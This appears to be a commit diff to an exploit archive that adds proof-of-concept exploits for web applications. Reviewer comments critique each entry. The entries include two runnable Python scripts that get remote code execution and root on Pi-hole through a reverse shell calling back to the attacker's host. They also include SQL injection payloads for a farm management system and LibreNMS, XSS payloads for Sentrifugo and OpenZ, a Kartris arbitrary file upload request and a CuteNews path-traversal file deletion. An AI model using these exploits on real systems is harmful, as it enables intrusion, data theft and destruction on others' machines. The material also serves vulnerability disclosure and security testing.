DB: 2020-05-12

14 changes to exploits/shellcodes

SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions
Pi-hole < 4.4 - Authenticated Remote Code Execution
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation
Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection
Kartris 1.6 - Arbitrary File Upload
Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting
CuteNews 2.1.2 - Arbitrary File Deletion
OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting
Victor CMS 1.0 - 'post' SQL Injection
Complaint Management System 1.0 - Authentication Bypass
LibreNMS 1.46 - 'search' SQL Injection
This commit is contained in:
Offensive Security 2020-05-12 05:01:50 +00:00
parent 262c9c3eb6
commit 7cb5d48647
15 changed files with 1066 additions and 3 deletions


@ -0,0 +1,111 @@
# Exploit Title: Kartris 1.6 - Arbitrary File Upload
# Dork: N/A
# Date: 2020-05-08
# Exploit Author: Nhat Ha - Sun CSR
# Vendor Homepage: https://www.cactusoft.com/
# Software Link: https://www.kartris.com/
# Version: 1.6
# Category: Webapps
# Tested on: WiN10_x64/KaLiLinuX_x64
# CVE: N/A
# POC: https://localhost/Admin/_GeneralFiles.aspx
#
POST /Admin/_GeneralFiles.aspx HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
Firefox/76.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------9604487443072642880454762058
Content-Length: 18484
Origin: 192.168.1.1
Connection: close
Referer: https://192.168.1.1/Admin/_GeneralFiles.aspx
Cookie: __cfduid=d1e56d596943226c869a1186e06b8d8661588757096;
ASP.NET_SessionId=abbnm4jh04wmdbl2gukr5t5w;
KartrisBasket870c8=s=7i7lpj21819; KartrisBackAuth870c8=xxxxxxxxxxxxx
Upgrade-Insecure-Requests: 1
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="scrManager_HiddenField"
;;AjaxControlToolkit, Version=4.1.7.123, Culture=neutral,
PublicKeyToken=28f01b0e84b6d53e:en-GB:57898466-f347-4e5c-9527-24f201596811:475a4ef5:5546a2b:d2e10b12:effe2a26:37e2e5c9:1d3ed089:751cdd15:dfad98a5:497ef277:a43b07eb:3cf12cf1;
-----------------------------9604487443072642880454762058
Content-Disposition: form-data;
name="_UC_CategoryMenu_tvwCategory_ExpandState"
cccccccccc
-----------------------------9604487443072642880454762058
Content-Disposition: form-data;
name="_UC_CategoryMenu_tvwCategory_SelectedNode"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data;
name="_UC_CategoryMenu_tvwCategory_PopulateLog"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$scrManager"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$_UC_AdminSearch$txtSearch"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$phdMain$hidFileNameToDelete"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$phdMain$filUploader";
filename="malicious.aspx"
Content-Type: text/plain
[Content Malicious File Here ! ]
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$splMainPage$hdnWidth"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$splMainPage$hdnMinWidth"
170px
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$splMainPage$hdnMaxWidth"
500px
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$phdMain$lnkUpload
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="__EVENTARGUMENT"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="__VIEWSTATE"
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
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
54DD7DF0
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="__VIEWSTATEENCRYPTED"
-----------------------------9604487443072642880454762058--
# Access malicious file following the link:
https://localhost/uploads/General/malicious.aspx
# How to fix: Update the latest version
# Commit fix:
https://github.com/cactusoft/kartris/commit/e9450dc1f90aa6167f1db1a6f137ea07cacb2a5c
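Review bot: the title and header leave out the main precondition: the PoC request is sent to `/Admin/_GeneralFiles.aspx` with a back-office session (`ASP.NET_SessionId` plus `KartrisBackAuth870c8=xxxxxxxxxxxxx`), so this is an authenticated arbitrary file upload by an admin user and should be titled that way, as the Pi-hole entries in the same commit are. The request is also not replayable as printed: `Host: 192.168.1.1` and `Referer: https://192.168.1.1/Admin/_GeneralFiles.aspx` disagree with the `https://localhost/Admin/_GeneralFiles.aspx` POC line and the `https://localhost/uploads/General/malicious.aspx` retrieval URL, and `Origin: 192.168.1.1` has no scheme; pick one host. Finally, "How to fix: Update the latest version" plus a bare commit link tells a reader nothing about what the fix does; one sentence on what the referenced commit changes in the `filUploader` handling (the part that lets `malicious.aspx` land in a web-served directory despite `Content-Type: text/plain`) would let operators verify their build has it.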

exploits/linux/webapps/48442.py Executable file

@ -0,0 +1,95 @@
#!/usr/bin/env python3
# Pi-hole <= 4.4 RCE
# Author: Nick Frichette
# Homepage: https://frichetten.com
#
# Note: This exploit must be run with root privileges and port 80 must not be occupied.
# While it is possible to exploit this from a non standard port, for the sake of
# simplicity (and not having to modify the payload) please run it with sudo privileges.
# Or setup socat and route it through there?
import requests
import sys
import socket
import _thread
import time
if len(sys.argv) < 4:
print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port* *(Optional) root*")
print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.")
exit()
SESSION = dict(PHPSESSID=sys.argv[1])
TARGET_IP = sys.argv[2]
LOCAL_IP = sys.argv[3]
LOCAL_PORT = sys.argv[4]
if len(sys.argv) == 6:
ROOT = True
# Surpress https verify warnings
# I'm asuming some instances will use self-signed certs
requests.packages.urllib3.disable_warnings()
# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell.
payload = """<?php
shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'")
?>
""" %(LOCAL_IP, LOCAL_PORT)
def send_response(thread_name):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCAL_IP,int(80)))
sock.listen(5)
connected = False
while not connected:
conn,addr = sock.accept()
if thread_name == "T1":
print("[+] Received First Callback")
conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
else:
print("[+] Received Second Callback")
print("[+] Uploading Payload")
conn.sendall(bytes(payload, "utf-8"))
conn.close()
connected = True
sock.close()
_thread.start_new_thread(send_response,("T1",))
# Fetch token
resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False)
response = str(resp.content)
token_loc = response.find("name=\"token\"")
token = response[token_loc+20:token_loc+64]
# Make request with token
data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
if resp.status_code == 200:
print("[+] Put Stager Success")
# Update gravity
resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
time.sleep(3)
_thread.start_new_thread(send_response,("T2",))
# Update again to trigger upload
resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
print("[+] Triggering Exploit")
try:
requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False)
except:
# We should be silent to avoid filling the cli window
None
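Review bot: the argument check `if len(sys.argv) < 4:` is off by one: the code below it reads `sys.argv[4]` for `LOCAL_PORT`, so running the script with exactly four arguments (cookie, URL, IP and no port) passes the check and dies with an IndexError instead of printing the usage; it should be `< 5`. The usage text also advertises an "*(Optional) root*" fifth argument and the block `if len(sys.argv) == 6: ROOT = True` sets a flag that nothing in this file reads (the root chain is the separate 48443.py), so drop the flag from the usage or remove the dead branch; the usage text further says "5 parameters" while listing four. Two smaller points: the CSRF token is recovered by fixed offsets, `response[token_loc+20:token_loc+64]`, instead of parsing the `value` attribute of the `name="token"` input, which silently breaks if attribute order or token length changes; and `exit()` after a usage error returns status 0, so a wrapper cannot distinguish a usage error from success.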

exploits/linux/webapps/48443.py Executable file

@ -0,0 +1,119 @@
#!/usr/bin/env python3
# Pi-hole <= 4.4 RCE
# Author: Nick Frichette
# Homepage: https://frichetten.com
#
# Note: This exploit must be run with root privileges and port 80 must not be occupied.
# While it is possible to exploit this from a non standard port, for the sake of
# simplicity (and not having to modify the payload) please run it with sudo privileges.
# Or setup socat and route it through there?
import requests
import sys
import socket
import _thread
import time
if len(sys.argv) < 4:
print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port*")
print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.")
exit()
SESSION = dict(PHPSESSID=sys.argv[1])
TARGET_IP = sys.argv[2]
LOCAL_IP = sys.argv[3]
LOCAL_PORT = sys.argv[4]
# Surpress https verify warnings
# I'm asuming some instances will use self-signed certs
requests.packages.urllib3.disable_warnings()
# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell.
shell_payload = """<?php
shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'")
?>
""" %(LOCAL_IP, LOCAL_PORT)
root_payload = """<?php
shell_exec("sudo pihole -a -t")
?>
"""
def send_response(thread_name):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCAL_IP,int(80)))
sock.listen(5)
connected = False
while not connected:
conn,addr = sock.accept()
if thread_name == "T1":
print("[+] Received First Callback")
conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
elif thread_name == "T2":
print("[+] Received Second Callback")
print("[+] Uploading Root Payload")
conn.sendall(bytes(root_payload, "utf-8"))
elif thread_name == "T3":
print("[+] Received Third Callback")
conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
else:
print("[+] Received Fourth Callback")
print("[+] Uploading Shell Payload")
conn.sendall(bytes(shell_payload, "utf-8"))
conn.close()
connected = True
sock.close()
_thread.start_new_thread(send_response,("T1",))
# Fetch token
resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False)
response = str(resp.content)
token_loc = response.find("name=\"token\"")
token = response[token_loc+20:token_loc+64]
# Make request with token
data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
if resp.status_code == 200:
print("[+] Put Root Stager Success")
# Update gravity
resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
time.sleep(3)
_thread.start_new_thread(send_response,("T2",))
# Update again to trigger upload of root redirect
resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
time.sleep(1)
_thread.start_new_thread(send_response,("T3",))
data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o teleporter.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
if resp.status_code == 200:
print("[+] Put Shell Stager Success")
resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
time.sleep(1)
_thread.start_new_thread(send_response,("T4",))
resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
print("[+] Triggering Exploit")
try:
requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False)
except:
# We should be silent to avoid filling the cli window
None
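Review bot: the same off-by-one as in 48442.py is present here: `if len(sys.argv) < 4:` guards code that reads `sys.argv[4]`, so a four-argument invocation raises IndexError rather than showing the usage; make it `< 5` (and the usage still says "5 parameters" while listing four). More important for anyone running this: the second stager, `"newuserlists":"http://"+LOCAL_IP+"#\" -o teleporter.php -d \""`, overwrites the web UI's real `teleporter.php` with the reverse-shell payload and nothing restores it, so a run leaves the target's admin interface clobbered; the header should flag that the escalation step is destructive, or the script should fetch and stash the original before the overwrite. The chain as written (shell payload written over `teleporter.php`, then `fun.php` running `shell_exec("sudo pihole -a -t")` from the web server account) only escalates if that account may run `sudo pihole` without a password; that precondition belongs in the header comment next to the port-80 requirement so testers know why the "Root Stager" stage may silently do nothing.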


@ -0,0 +1,55 @@
# Exploit Title: LibreNMS 1.46 - 'search' SQL Injection
# Google Dork:unknown
# Date: 2019-09-01
# Exploit Author: Punt
# Vendor Homepage: https://www.librenms.org
# Software Link: https://www.librenms.org
# Version:1.46 and less
# Tested on:Linux and Windows
# CVE: N/A
#Affected Device: more than 4k found on Shodan and Censys.
#Description about the bug
Vunlerable script /html/ajax_serarch.php
if (isset($_REQUEST['search'])) {
$search = mres($_REQUEST['search']);
header('Content-type: application/json');
if (strlen($search) > 0) {
$found = 0;
if ($_REQUEST['type'] == 'group') {
include_once '../includes/device-groups.inc.php';
foreach (dbFetchRows("SELECT id,name FROM device_groups WHERE name LIKE '%".$search."%'") as $group) {
if ($_REQUEST['map']) {
$results[] = array(
'name' => 'g:'.$group['name'],
'group_id' => $group['id'],
as you can there is a search parameter $search = mres($_REQUEST['search']); which accepts a user input using $_REQUEST['']
dbFetchRows() used to exectute sql query
now lets check the mres() function
the mres() fuction is located under /includes/common.php
function mres($string)
{
return $string; //
global $database_link;
return mysqli_real_escape_string($database_link, $string);
as you can see the mres() function call's the mysqli_real_escape_string() which can be bypassed by '%'
#POC:
1st lgoin to your LibreNMS
2nd go to this /ajax_search.php?search=%27&type=group or /ajax_search.php?search=%27&type=alert-rules
3rd you will see an sql syntax error
The Librenms team have applyed a patch .
Thanks
Punt (From Ethiopia)
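Review bot: the root-cause paragraph contradicts its own excerpt: the quoted `mres()` body begins with `return $string; //`, so the `mysqli_real_escape_string($database_link, $string)` call beneath it is dead code and `$search` reaches `dbFetchRows("SELECT id,name FROM device_groups WHERE name LIKE '%".$search."%'")` unescaped. The sentence "the mres() function call's the mysqli_real_escape_string() which can be bypassed by '%'" should be replaced with that observation; a `%` is a LIKE wildcard, not an escaping bypass, and the PoC itself injects `%27`, a single quote, which is what produces the syntax error. Also, the vulnerable script is named `/html/ajax_serarch.php` in the description but `/ajax_search.php` in the PoC; only the latter spelling is consistent with the excerpt. Minor: the header carries `Date: 2019-09-01` for an entry published in May 2020, "more than 4k found on Shodan and Censys" should say what was counted (exposed LibreNMS instances of any version, not confirmed 1.46), and "The Librenms team have applyed a patch" would be far more useful as a link to the fixing commit or the first fixed release.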


@ -6,7 +6,7 @@
# Software Link: https://en.ulicms.de/current_versions.html
# Version: 2020.1
# Tested on: Windows
# CVE : N/A
# CVE : CVE-2020-12704
### Vulnerability : Stored Cross-Site Scripting


@ -7,7 +7,7 @@
https://lepton-cms.org/posts/new-release-lepton-4.5.0-139.php
# Version: 4.5.0
# Tested on: Windows
# CVE : N/A
# CVE : CVE-2020-12707
### Vulnerability : Persistent Cross-Site Scripting


@ -6,7 +6,7 @@
# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30
# Version: 9.03.50
# Tested on: Windows
# CVE : N/A
# CVE : CVE-2020-12706
### Vulnerability : Persistent Cross-Site Scripting


@ -0,0 +1,48 @@
# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection
# Date: 2020-05-06
# Exploit Author: Tarun Sehgal
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/farm_management_system_in_php_with_source_code.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
---------------------------------------------------------------------------------
#parameter Vulnerable: uname
# Injected Request
#Below request will print database name and MariaDB version.
POST /fms/Login/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Origin: http://localhost
Connection: close
Referer: http://localhost/fms/index.php
Cookie: PHPSESSID=fiiiu7pq9kvhdr770ahd7dejco
Upgrade-Insecure-Requests: 1
uname=admin' OR (SELECT 1935 FROM(SELECT COUNT(*),CONCAT(database(),(SELECT (ELT(1935=1935,1))),0x3a,version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dqgD&pass=admin&category=1
-----------------------------------------------------------------------------------------------------------------------------
#Response
HTTP/1.1 302 Found
Date: Wed, 06 May 2020 13:21:36 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.5
X-Powered-By: PHP/7.4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: error.php
Content-Length: 356
Connection: close
Content-Type: text/html; charset=UTF-8
<b>Warning</b>: mysqli_query(): (23000/1062): Duplicate entry 'agroculture1:10.4.11-MariaDB1' for key 'group_key' in <b>
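Review bot: the advisory should state that the data leak depends on PHP warnings being displayed: the response is a `302 Found` to `error.php`, and the database name and version appear only because the `mysqli_query(): (23000/1062): Duplicate entry 'agroculture1:10.4.11-MariaDB1'` warning is echoed into the body. With `display_errors` off the same `uname` injection still works, but only as boolean- or time-based blind, so a tester must not read a clean 302 as "not vulnerable". The vulnerable code is identified only by the request path `/fms/Login/login.php`; quoting the line that concatenates `uname` into the login SELECT would make the finding verifiable against the source archive linked in the header. The `-- dqgD` tail and the `FLOOR(RAND(0)*2)` grouping trick are sqlmap's; saying so would tell readers the payload is a generic error-based probe, not something specific to this application.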


@ -0,0 +1,148 @@
# Exploit Title: Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting
# Dork: N/A
# Date: 2020-05-06
# Exploit Author: Vulnerability-Lab
# Vendor: http://www.sentrifugo.com/
# Link: http://www.sentrifugo.com/download
# Version: 3.2
# Category: Webapps
# CVE: N/A
Document Title:
===============
Sentrifugo v3.2 CMS - Persistent XSS Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2229
Product & Service Introduction:
===============================
http://www.sentrifugo.com/
http://www.sentrifugo.com/download
Affected Product(s):
====================
Sentrifugo
Product: Sentrifugo v3.2 - CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-05-05: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Mahara v19.10.2 CMS web-application series.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.
The persistent vulnerability is located in the `expense_name` parameters
of the `/expenses/expenses/edit` module in the `index.php` file.
Remote attackers with low privileges are able to inject own malicious
persistent script code as expenses entry. The injected code can
be used to attack the frontend or backend of the web-application. The
request method to inject is POST and the attack vector is located
on the application-side. Entries of expenses can be reviewed in the
backend by higher privileged accounts as well.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] index.php/expenses/expenses/edit
Vulnerable Input(s):
[+] Expenses Name
Vulnerable File(s):
[+] index.php
Vulnerable Parameter(s):
[+] expense_name
Affected Module(s):
[+] index.php/expenses/expenses
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Vulnerable Source
<div id="maincontentdiv">
<div id="dialog-confirm" style="display:none;">
<div class="newframe-div">
<div class="new-form-ui height32">
<div class="division">
<input type="text" maxlength="12" id="number_value"
name="number_value"></div>
<span class="errors"
id="errors-contactnumber"></span></div></div></div>
<div id="empstatus-alert" style="display:none;">
<div class="newframe-div"><div id="empstatusmessage"></div></div></div>
<div id="empleaves-alert" style="display:none;">
<div class="newframe-div"><div id="empleavesmessage"></div></div></div>
--- PoC Session Logs [POST] --- (Expenses Inject)
http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
Host: sentrifugo.localhost:8080
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 352
Origin: http://sentrifugo.localhost:8080
Connection: keep-alive
Referer: http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
Cookie: PHPSESSID=h67jk6dashpvgn5n3buc6uia87;
_ga=GA1.2.788961556.1587849443; _gid=GA1.2.1158360779.1587849443
id=&limit=&offset=&parameter=all&currencyid=1&file_original_names=&file_new_names=&last_inserted_receipts=&receiptId=&expense_Id=&
expense_name=<img src="evil.source"
onload=alert(document.domain)>&category_id=&project_id=&expense_date=&expense_currency_id=2&
expense_amount=&cal_amount=0&is_from_advance=&expense_payment_id=&expense_payment_ref_no=&trip_id=&description=&post_receipt_ids=&submit=Save
-
POST: HTTP/1.1 200 OK
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.10
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 19284
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Reference(s):
http://sentrifugo.localhost:8080/index.php
http://sentrifugo.localhost:8080/index.php/expenses
http://sentrifugo.localhost:8080/index.php/expenses/expenses/
http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
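Review bot: the opening sentence of Technical Details names the wrong product: "the official Mahara v19.10.2 CMS web-application series" is carried over from another advisory and should read Sentrifugo v3.2, which is what the title, header and every URL in the PoC refer to. The "PoC: Vulnerable Source" excerpt also does not evidence the finding: it shows a `number_value` input inside `#dialog-confirm` and two hidden alert divs, none of which contain the injected `expense_name`; it should be replaced with the markup where `<img src="evil.source" onload=alert(document.domain)>` is rendered unescaped (the expenses listing or the edit form), because a `200 OK` on the save request would follow a properly encoded save just as well. Minor: the POST log is missing its request line (`POST /index.php/expenses/expenses/edit HTTP/1.1`), and the `_ga`/`_gid` cookies play no part in the reproduction and can be dropped.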


@ -0,0 +1,37 @@
# Exploit Title: CuteNews 2.1.2 - Arbitrary File Deletion
# Date: 2020-05-08
# Author: Besim ALTINOK
# Vendor Homepage: https://cutephp.com
# Software Link: https://cutephp.com/click.php?cutenews_latest
# Version: v2.1.2 (Maybe it affect other versions)
# Tested on: Xampp
# Credit: İsmail BOZKURT
# Remotely: Yes
Description:
------------------------------------------------------------------------
In the "Media Manager" area, users can do arbitrarily file deletion.
Because the developer did not use the unlink() function as secure. So, can
be triggered this vulnerability by a low user account
Arbitrary File Deletion PoC
--------------------------------------------------------------------------------
POST /cute/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 **********************************
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 222
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/cute/index.php
Cookie: CUTENEWS_SESSION=3f6a6ea7089e3a6a04b396d382308022
Upgrade-Insecure-Requests: 1
mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=27966e9129793e80a70089ee1c3ebfd5-tester&__signature_dsi=0ad6659c2aa31871b0b44617cf0b1200&rm%5B%5D=../avatar.png&do_action=delete
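Review bot: the description should name the defect instead of "did not use the unlink() function as secure": the `rm[]=../avatar.png` value in the `mod=media&opt=media&...&do_action=delete` request reaches `unlink()` with its path separators intact, so a relative path escapes the media folder. The preconditions visible in the request should be spelled out as well: a valid `CUTENEWS_SESSION` and matching `__signature_key`/`__signature_dsi` values, i.e. an authenticated user with Media Manager access (the text says a "low user account"; the minimum role that has Media Manager should be stated), and deletion is bounded by what the web server process may unlink. Only one level of `../` is demonstrated; one more request showing whether `../../` reaches files outside the CuteNews tree would establish the actual impact, which is what separates defacement of uploads from a denial of service.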


@ -0,0 +1,192 @@
# Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting
# Date: 2020-05-11
# Exploit Author: Vulnerability-Lab
# Vendor: https://www.openz.de/
# https://www.openz.de/download.html
Document Title:
===============
OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2234
Common Vulnerability Scoring System:
====================================
4.6
Product & Service Introduction:
===============================
https://www.openz.de/
https://www.openz.de/download.html
Affected Product(s):
====================
OpenZ
Product: OpenZ v3.6.60 - ERP (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-05-06: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered
in the official OpenZ v3.6.60 ERP web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent vulnerability is located in the `inpname` and
`inpdescripción` parameters of the `Employee` add/register/edit
module in the `menu.html` file. Remote attackers with low privileges are
able to inject own malicious persistent script code as
name or description. The injected code can be used to attack the
frontend or backend of the web-application. The request method
to inject is POST and the attack vector is located on the
application-side. The attack can be triggered from low privilege user
accounts against higher privilege user accounts like manager or
administrators to elevate privileges via session hijacking.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected
application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Employee
Vulnerable Input(s):
[+] Mitarbeiter Name
[+] Beschreibung
Vulnerable File(s):
[+] Menu.html
Vulnerable Parameter(s):
[+] inpname
[+] inpdescription
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the openz web-application
2. Register, add or edit via profile settings the inpname &
inpdescription parameter inputs
3. Edit inpname & inpdescription parameter of the profile and save the entry
Note: The execute occurs on preview of the user credentials in the
/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html
4. Successful reproduce of the persistent web vulnerability!
--- POC Session Logs [POST] --- (Inject via Add / Edit)
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html
Host: localhost:8080
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 1464
Origin: https://localhost:8080
Connection: keep-alive
Referer:
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html
Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544;
_ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275
Command=SAVE_EDIT_RELATION&inpLastFieldChanged=inpdescription&inpkeyColumnIdInp=&inpParentKeyColumn=&inpDirectKey=&
inpKeyReferenceColumnName=&inpTableReferenceId=&inpKeyReferenceId=&autosave=N&inpnewdatasetindicator=&inpnewdataseIdVal=&
inpenabledautosave=Y&inpisemployee=Y&inpistaxexempt=N&inpadClientId=C726FEC915A54A0995C568555DA5BB3C&inpaAssetId=&
inpcGreetingId=&inpcBpartnerId=8BEB3E9FD5D24F9BBCF777A51D53F5AF&inpissummary=N&inprating=N&inpTableId=AC9B98C649CD4F55B37714008EE8519F&
inpkeyColumnId=C_BPartner_ID&inpKeyName=inpcBpartnerId&mappingName=/org.openbravo.zsoft.smartui.Employee/
EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html&inpwindowId=39D3CD9F77A942D690965D49106F011B&
inpTabId=A3D0B320B69845B386024B5FF6B1E266&inpCommandType=EDIT&updatedTimestamp=20200426170335&inpParentOrganization=&
inpadOrgId=1AF9E07685234E0A9FEC1D9B58A4876B&inpadImageId=&
inpvalue=325235&inpname=>"><iframe
